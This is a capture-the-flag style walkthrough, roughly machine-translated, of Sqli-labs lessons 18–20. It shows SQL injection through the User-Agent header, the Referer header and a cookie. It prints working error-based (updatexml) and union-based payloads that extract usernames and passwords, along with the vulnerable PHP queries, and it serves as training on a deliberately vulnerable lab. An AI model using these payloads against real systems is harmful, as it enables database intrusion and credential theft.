Sqli-labs customs clearance (less18-less20)

  less-18
    USER_AGENT
    REMOTE_ADDR
  less-19
  less-20
    setcookie()
    header()
    date()

less-18

title ：POST - Header injection - Uagent field Error based
http Head error injection

The source code is not completely posted , Open it by yourself , Paste only part

$uname = check_input($con1, $_POST['uname']);
$passwd = check_input($con1, $_POST['passwd']);

name and password You can test in the previous way , But people do escape and limit the length of this place

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

Get two values in the request package
One is

USER_AGENT

User-Agent yes Http Part of the agreement , Part of the head domain ,User Agent Also abbreviated as UA. In a more common sense , It is a kind of browser that provides access to websites with the type of browser you use 、 Operating system and version 、CPU type 、 Browser rendering engine 、 Browser language 、 Identification of browser plug-ins and other information .UA String in every browser HTTP Send the request to the server ！

One is

REMOTE_ADDR

What I checked is to get the client IP, But what is given here seems to be the server IP, I didn't think about it here , It has little impact on us

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

This is our statement of existence injection point , After successful login , He will insert the following data into the database , Belong to insert Type of Injection

insert Type injection also needs to cooperate with the error reporting function updatexml()、extractvalue()、floor() Echo information , Just make sure it is closed , But the injection point here is uagent Inside

So let's revise that

paylaod

',1,updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password) from users limit 0,1)),1))#

SQL sentence

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('',1,updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password) from users limit 0,1)),1))#', '127.0.0.1', 1)

less-19

title ：POST - Header injection Referer field Error based

Follow 18 It's the same , But is Referer As insert Value , This kind of thing also depends on feeling , such as name,password Do you want to test it , To be tested , This kind of thing is still skilled , It feels right

Look at the source code

$uagent = $_SERVER['HTTP_REFERER'];

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

Same method

It is amended as follows

payload

',updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password) from users limit 0,1)),0))#

Query statement

INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('',updatexml(1,concat(0x7e,(select concat_ws(0x7e,username,password) from users limit 0,1)),0))#', '$IP')

less-20

title ：POST - Cookie injections Uagent filed -error based

The source code is too long , Pick only part

if(!isset($_COOKIE['uname']))

In the packet cookie Make a judgment , If it does not exist, return to the login page , If it exists, it will not return

setcookie('uname', $cookee, time()+3600);

setcookie()

setcookie() Function to send a HTTP cookie.
What is? cookie Know for yourself , Can be combined with session、token Get to know each other . See ：PHP setcookie() function

grammar ：

setcookie(name,value,expire,path,domain,secure) 

$cookee = $row1['username'];

$cookee The value of is actually the user name of the database query , Be mistaken cookie Pass to user

After successful login response package

And the next time the user requests request package

header ('Location: index.php');

header()

header() Function to send the original HTTP Headlines .
It's important to recognize this , It must be invoked before any actual output is sent. header() function
PHP header() function

grammar ：

header(string,replace,http_response_code)

Jump to the page

header(‘Location:’.$url); //Location and ":" No space between .

$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;

date($format, $timestamp)

date()

date() Function can convert the timestamp format into a more readable date and time . A timestamp is a sequence of characters , Indicates the date of a certain event / Time , See PHP date() function

grammar ：

string date ( string $format [, int $timestamp ] )

Here is one for you cookie The expiration time of

There's nothing else to say , Let's sort out the flow chart

What do you mean , If not , You can mention that I won't change anyway

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

Here is the query statement , Single quotation mark character , Still the previous steps
Take a look at the echo

payload

' union select 1,2,3#

Three echoes
paylaod

' union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3#

SELECT * FROM users WHERE username='' union select 1,(select group_concat(concat_ws(0x7e,username,password)) from users),3#' LIMIT 0,1

Take down

page1 These two have nothing